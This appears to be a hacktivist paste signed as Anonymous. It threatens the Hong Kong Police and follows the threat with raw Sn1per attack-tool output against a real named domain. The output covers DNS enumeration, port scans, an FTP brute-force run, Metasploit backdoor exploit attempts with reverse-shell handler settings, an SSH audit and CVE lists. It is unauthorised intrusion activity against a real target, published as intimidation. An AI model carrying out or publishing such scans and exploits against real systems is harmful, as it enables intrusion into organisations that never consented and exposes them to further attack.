· 6 years ago · Oct 02, 2019, 03:08 PM
1Greetings Hong Kong Police!
2
3We are
4 _ _
5 _| || |_ /\
6|_ __ _| / \ _ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___
7 _| || |_ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|
8|_ __ _/ ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \
9 |_||_|/_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/
10 __/ |
11 |___/
12
13Your incessant violence against innocent protestors has caught our attention.
14
15In short, today we would like to offer you a challenge! oo0XOX0oo
16
17Before the better part of our collective decides to unleash hell upon this server,
18
19and many others, (after seeing a multitude vulnerabilities)
20
21we would like to invite you to begin deploying security patches to circumvent our attempts to exploit them.
22
23Therefore below we have provided you with a free and complimentary security audit!
24
25We knew you would be pleased. lulz
26
27
28
29We do not forgive
30We do not forget
31Expect us!
32
33Tick,
34 Tock
35
36Good Luck!
37
38[91m ____ [0m
39[91m _________ / _/___ ___ _____[0m
40[91m / ___/ __ \ / // __ \/ _ \/ ___/[0m
41[91m (__ ) / / // // /_/ / __/ / [0m
42[91m /____/_/ /_/___/ .___/\___/_/ [0m
43[91m /_/ [0m
44[0m
45[93m + -- --=[https://xerosecurity.com
46[93m + -- --=[Sn1per v7.2 by @xer0dayz
47[0m
48[92m====================================================================================[0m
49[91m GATHERING DNS INFO [0m
50[92m====================================================================================[0m
51
52dnsenum VERSION:1.2.4
53[1;34m
54----- www.rhkpa.org -----
55[0m[1;31m
56
57Host's addresses:
58__________________
59
60[0mrhkpa.org. 14398 IN A 216.172.168.193
61[1;31m
62
63Name Servers:
64______________
65
66[0mns1.bluehost.com. 3600 IN A 162.159.24.80
67ns2.bluehost.com. 3600 IN A 162.159.25.175
68[1;31m
69
70Mail (MX) Servers:
71___________________
72
73[0mrhkpa-org.mail.protection.outlook.com. 3600 IN A 104.47.20.36
74rhkpa-org.mail.protection.outlook.com. 3600 IN A 104.47.21.36
75[1;31m
76
77Trying Zone Transfers and getting Bind Versions:
78_________________________________________________
79
80[0m
81Trying Zone Transfer for www.rhkpa.org on ns1.bluehost.com ...
82
83Trying Zone Transfer for www.rhkpa.org on ns2.bluehost.com ...
84
85brute force file not specified, bay.
86[92m====================================================================================[0m
87[91m CHECKING FOR SUBDOMAIN HIJACKING [0m
88[92m====================================================================================[0m
89
90[92m====================================================================================[0m
91[91m PINGING HOST [0m
92[92m====================================================================================[0m
93
94[92m====================================================================================[0m
95[91m RUNNING TCP PORT SCAN [0m
96[92m====================================================================================[0m
97Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
98Nmap scan report for www.rhkpa.org (216.172.168.193)
99Host is up (0.11s latency).
100rDNS record for 216.172.168.193: box6011.bluehost.com
101Not shown: 469 filtered ports, 1 closed port
102Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
103PORT STATE SERVICE
10421/tcp open ftp
10522/tcp open ssh
10653/tcp open domain
10780/tcp open http
108110/tcp open pop3
109143/tcp open imap
110443/tcp open https
111465/tcp open smtps
112587/tcp open submission
113993/tcp open imaps
114995/tcp open pop3s
1158080/tcp open http-proxy
1168443/tcp open https-alt
117
118Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
119[92m====================================================================================[0m
120[91m RUNNING UDP PORT SCAN [0m
121[92m====================================================================================[0m
122Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
123Nmap scan report for www.rhkpa.org (216.172.168.193)
124Host is up (0.084s latency).
125rDNS record for 216.172.168.193: box6011.bluehost.com
126
127PORT STATE SERVICE
12853/udp open domain
12967/udp open|filtered dhcps
13068/udp open|filtered dhcpc
13169/udp open|filtered tftp
13288/udp open|filtered kerberos-sec
133123/udp open|filtered ntp
134137/udp open|filtered netbios-ns
135138/udp open|filtered netbios-dgm
136139/udp open|filtered netbios-ssn
137161/udp open|filtered snmp
138162/udp open|filtered snmptrap
139389/udp open|filtered ldap
140500/udp open|filtered isakmp
141520/udp open|filtered route
1422049/udp open|filtered nfs
143
144Nmap done: 1 IP address (1 host up) scanned in 3.28 seconds
145
146[92m====================================================================================[0m
147[91m RUNNING INTRUSIVE SCANS [0m
148[92m====================================================================================[0m
149[93m + -- --=[Port 21 opened... running tests...[0m
150[92m====================================================================================[0m
151[91m RUNNING NMAP SCRIPTS [0m
152[92m====================================================================================[0m
153Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
154NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
155NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
156NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
157Nmap scan report for www.rhkpa.org (216.172.168.193)
158Host is up (0.13s latency).
159rDNS record for 216.172.168.193: box6011.bluehost.com
160
161PORT STATE SERVICE VERSION
16221/tcp open ftp Pure-FTPd
163| ftp-brute:
164| Accounts: No valid accounts found
165|_ Statistics: Performed 4123 guesses in 184 seconds, average tps: 20.1
166| vulscan: VulDB - https://vuldb.com:
167| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
168| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
169| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
170|
171| MITRE CVE - https://cve.mitre.org:
172| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
173|
174| SecurityFocus - https://www.securityfocus.com/bid/:
175| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
176|
177| IBM X-Force - https://exchange.xforce.ibmcloud.com:
178| No findings
179|
180| Exploit-DB - https://www.exploit-db.com:
181| No findings
182|
183| OpenVAS (Nessus) - http://www.openvas.org:
184| No findings
185|
186| SecurityTracker - https://www.securitytracker.com:
187| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
188| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
189| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
190| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
191|
192| OSVDB - http://www.osvdb.org:
193| No findings
194|_
195Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
196Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 4.9 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.5 (97%), Linux 3.7 (97%)
197No exact OS matches for host (test conditions non-ideal).
198
199TRACEROUTE
200HOP RTT ADDRESS
2011 129.74 ms box6011.bluehost.com (216.172.168.193)
202
203OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
204Nmap done: 1 IP address (1 host up) scanned in 194.08 seconds
205[92m====================================================================================[0m
206[91m RUNNING METASPLOIT FTP VERSION SCANNER [0m
207[92m====================================================================================[0m
208[1m[31m[-][0m ***
209[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
210 Is the server running on host "localhost" (::1) and accepting
211 TCP/IP connections on port 5432?
212could not connect to server: Connection refused
213 Is the server running on host "localhost" (127.0.0.1) and accepting
214 TCP/IP connections on port 5432?
215
216[1m[31m[-][0m ***
217[0mRHOST => www.rhkpa.org
218[0mRHOSTS => www.rhkpa.org
219[0m[0m[1m[32m[+][0m 216.172.168.193:21 - FTP Banner: '220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 6 of 1000 allowed.\x0d\x0a220-Local time is now 06:57. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
220[1m[34m[*][0m www.rhkpa.org:21 - Scanned 1 of 1 hosts (100% complete)
221[1m[34m[*][0m Auxiliary module execution completed
222[0m[92m====================================================================================[0m
223[91m RUNNING METASPLOIT ANONYMOUS FTP SCANNER [0m
224[92m====================================================================================[0m
225[1m[31m[-][0m ***
226[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
227 Is the server running on host "localhost" (::1) and accepting
228 TCP/IP connections on port 5432?
229could not connect to server: Connection refused
230 Is the server running on host "localhost" (127.0.0.1) and accepting
231 TCP/IP connections on port 5432?
232
233[1m[31m[-][0m ***
234[0mRHOST => www.rhkpa.org
235[0mRHOSTS => www.rhkpa.org
236[0m[0m[1m[34m[*][0m www.rhkpa.org:21 - Scanned 1 of 1 hosts (100% complete)
237[1m[34m[*][0m Auxiliary module execution completed
238[0m[92m====================================================================================[0m
239[91m RUNNING VSFTPD 2.3.4 BACKDOOR EXPLOIT [0m
240[92m====================================================================================[0m
241[1m[31m[-][0m ***
242[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
243 Is the server running on host "localhost" (::1) and accepting
244 TCP/IP connections on port 5432?
245could not connect to server: Connection refused
246 Is the server running on host "localhost" (127.0.0.1) and accepting
247 TCP/IP connections on port 5432?
248
249[1m[31m[-][0m ***
250[0mRHOST => www.rhkpa.org
251[0mRHOSTS => www.rhkpa.org
252[0mLHOST => 127.0.0.1
253[0mLPORT => 4444
254[0m[0m[1m[34m[*][0m 216.172.168.193:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
255220-You are user number 5 of 1000 allowed.
256220-Local time is now 06:59. Server port: 21.
257220-This is a private system - No anonymous login
258220-IPv6 connections are also welcome on this server.
259220 You will be disconnected after 15 minutes of inactivity.
260[1m[34m[*][0m 216.172.168.193:21 - USER: 331 User O:) OK. Password required
261[1m[34m[*][0m Exploit completed, but no session was created.
262[0m[92m====================================================================================[0m
263[91m RUNNING PROFTPD 1.3.3C BACKDOOR EXPLOIT [0m
264[92m====================================================================================[0m
265[1m[31m[-][0m ***
266[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
267 Is the server running on host "localhost" (::1) and accepting
268 TCP/IP connections on port 5432?
269could not connect to server: Connection refused
270 Is the server running on host "localhost" (127.0.0.1) and accepting
271 TCP/IP connections on port 5432?
272
273[1m[31m[-][0m ***
274[0mRHOST => www.rhkpa.org
275[0mRHOSTS => www.rhkpa.org
276[0mLHOST => 127.0.0.1
277[0mLPORT => 4444
278[0m[0m[1m[34m[*][0m Started reverse TCP double handler on 10.89.0.94:4444
279[1m[34m[*][0m 216.172.168.193:21 - Sending Backdoor Command
280[1m[34m[*][0m Exploit completed, but no session was created.
281[0m[93m + -- --=[Port 22 opened... running tests...[0m
282[92m====================================================================================[0m
283[91m RUNNING SSH AUDIT [0m
284[92m====================================================================================[0m
285# general
286(gen) banner: SSH-2.0-OpenSSH_5.3
287(gen) software: OpenSSH 5.3
288(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
289(gen) compression: enabled (zlib@openssh.com)
290
291# key exchange algorithms
292(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
293 `- [info] available since OpenSSH 4.4
294
295# host-key algorithms
296(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
297(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
298 `- [warn] using small 1024-bit modulus
299 `- [warn] using weak random number generator could reveal the key
300 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
301
302# encryption algorithms (ciphers)
303(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
304(enc) aes192-ctr -- [info] available since OpenSSH 3.7
305(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
306
307# message authentication code algorithms
308(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
309 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
310(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
311 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
312(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
313 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
314 `- [warn] using encrypt-and-MAC mode
315 `- [info] available since OpenSSH 2.5.0
316(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
317 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
318 `- [warn] using encrypt-and-MAC mode
319 `- [info] available since OpenSSH 2.1.0
320
321# algorithm recommendations (for OpenSSH 5.3)
322(rec) -ssh-dss -- key algorithm to remove
323(rec) -hmac-ripemd160 -- mac algorithm to remove
324(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
325
326[92m====================================================================================[0m
327[91m RUNNING NMAP SCRIPTS [0m
328[92m====================================================================================[0m
329Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:00 UTC
330Nmap scan report for www.rhkpa.org (216.172.168.193)
331Host is up (0.13s latency).
332rDNS record for 216.172.168.193: box6011.bluehost.com
333
334PORT STATE SERVICE VERSION
33522/tcp open ssh OpenSSH 5.3 (protocol 2.0)
336|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
337|_ssh-brute: ERROR: Script execution failed (use -d to debug)
338|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
339|_ssh-run: ERROR: Script execution failed (use -d to debug)
340| vulners:
341| cpe:/a:openbsd:openssh:5.3:
342| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
343| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
344| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
345| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
346| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
347| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
348| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
349| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
350| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
351|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
352| vulscan: VulDB - https://vuldb.com:
353| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
354| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
355| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
356| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
357|
358| MITRE CVE - https://cve.mitre.org:
359| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
360| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
361| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
362| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
363| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
364| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
365| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
366| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
367| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
368|
369| SecurityFocus - https://www.securityfocus.com/bid/:
370| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
371| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
372| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
373| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
374| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
375| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
376| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
377| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
378| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
379| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
380| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
381| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
382| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
383| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
384| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
385| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
386| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
387| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
388| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
389| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
390| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
391| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
392| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
393| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
394| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
395| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
396| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
397| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
398| [75990] OpenSSH Login Handling Security Bypass Weakness
399| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
400| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
401| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
402| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
403| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
404| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
405| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
406| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
407| [61286] OpenSSH Remote Denial of Service Vulnerability
408| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
409| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
410| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
411| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
412| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
413| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
414| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
415| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
416| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
417| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
418| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
419| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
420| [30794] Red Hat OpenSSH Backdoor Vulnerability
421| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
422| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
423| [28531] OpenSSH ForceCommand Command Execution Weakness
424| [28444] OpenSSH X Connections Session Hijacking Vulnerability
425| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
426| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
427| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
428| [20956] OpenSSH Privilege Separation Key Signature Weakness
429| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
430| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
431| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
432| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
433| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
434| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
435| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
436| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
437| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
438| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
439| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
440| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
441| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
442| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
443| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
444| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
445| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
446| [6168] OpenSSH Visible Password Vulnerability
447| [5374] OpenSSH Trojan Horse Vulnerability
448| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
449| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
450| [4241] OpenSSH Channel Code Off-By-One Vulnerability
451| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
452| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
453| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
454| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
455| [2917] OpenSSH PAM Session Evasion Vulnerability
456| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
457| [2356] OpenSSH Private Key Authentication Check Vulnerability
458| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
459| [1334] OpenSSH UseLogin Vulnerability
460|
461| IBM X-Force - https://exchange.xforce.ibmcloud.com:
462| [83258] GSI-OpenSSH auth-pam.c security bypass
463| [82781] OpenSSH time limit denial of service
464| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
465| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
466| [72756] Debian openssh-server commands information disclosure
467| [68339] OpenSSH pam_thread buffer overflow
468| [67264] OpenSSH ssh-keysign unauthorized access
469| [65910] OpenSSH remote_glob function denial of service
470| [65163] OpenSSH certificate information disclosure
471| [64387] OpenSSH J-PAKE security bypass
472| [63337] Cisco Unified Videoconferencing OpenSSH weak security
473| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
474| [45202] OpenSSH signal handler denial of service
475| [44747] RHEL OpenSSH backdoor
476| [44280] OpenSSH PermitRootLogin information disclosure
477| [44279] OpenSSH sshd weak security
478| [44037] OpenSSH sshd SELinux role unauthorized access
479| [43940] OpenSSH X11 forwarding information disclosure
480| [41549] OpenSSH ForceCommand directive security bypass
481| [41438] OpenSSH sshd session hijacking
482| [40897] OpenSSH known_hosts weak security
483| [40587] OpenSSH username weak security
484| [37371] OpenSSH username data manipulation
485| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
486| [37112] RHSA update for OpenSSH signal handler race condition not installed
487| [37107] RHSA update for OpenSSH identical block denial of service not installed
488| [36637] OpenSSH X11 cookie privilege escalation
489| [35167] OpenSSH packet.c newkeys[mode] denial of service
490| [34490] OpenSSH OPIE information disclosure
491| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
492| [32975] Apple Mac OS X OpenSSH denial of service
493| [32387] RHSA-2006:0738 updates for openssh not installed
494| [32359] RHSA-2006:0697 updates for openssh not installed
495| [32230] RHSA-2006:0298 updates for openssh not installed
496| [32132] RHSA-2006:0044 updates for openssh not installed
497| [30120] OpenSSH privilege separation monitor authentication verification weakness
498| [29255] OpenSSH GSSAPI user enumeration
499| [29254] OpenSSH signal handler race condition
500| [29158] OpenSSH identical block denial of service
501| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
502| [25116] OpenSSH OpenPAM denial of service
503| [24305] OpenSSH SCP shell expansion command execution
504| [22665] RHSA-2005:106 updates for openssh not installed
505| [22117] OpenSSH GSSAPI allows elevated privileges
506| [22115] OpenSSH GatewayPorts security bypass
507| [20930] OpenSSH sshd.c LoginGraceTime denial of service
508| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
509| [17213] OpenSSH allows port bouncing attacks
510| [16323] OpenSSH scp file overwrite
511| [13797] OpenSSH PAM information leak
512| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
513| [13264] OpenSSH PAM code could allow an attacker to gain access
514| [13215] OpenSSH buffer management errors could allow an attacker to execute code
515| [13214] OpenSSH memory vulnerabilities
516| [13191] OpenSSH large packet buffer overflow
517| [12196] OpenSSH could allow an attacker to bypass login restrictions
518| [11970] OpenSSH could allow an attacker to obtain valid administrative account
519| [11902] OpenSSH PAM support enabled information leak
520| [9803] OpenSSH "
521| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
522| [9307] OpenSSH is running on the system
523| [9169] OpenSSH "
524| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
525| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
526| [8383] OpenSSH off-by-one error in channel code
527| [7647] OpenSSH UseLogin option arbitrary code execution
528| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
529| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
530| [7179] OpenSSH source IP access control bypass
531| [6757] OpenSSH "
532| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
533| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
534| [5517] OpenSSH allows unauthorized access to resources
535| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
536|
537| Exploit-DB - https://www.exploit-db.com:
538| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
539| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
540| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
541| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
542| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
543| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
544| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
545| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
546| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
547| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
548| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
549| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
550| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
551| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
552|
553| OpenVAS (Nessus) - http://www.openvas.org:
554| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
555| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
556| [881183] CentOS Update for openssh CESA-2012:0884 centos6
557| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
558| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
559| [870763] RedHat Update for openssh RHSA-2012:0884-04
560| [870129] RedHat Update for openssh RHSA-2008:0855-01
561| [861813] Fedora Update for openssh FEDORA-2010-5429
562| [861319] Fedora Update for openssh FEDORA-2007-395
563| [861170] Fedora Update for openssh FEDORA-2007-394
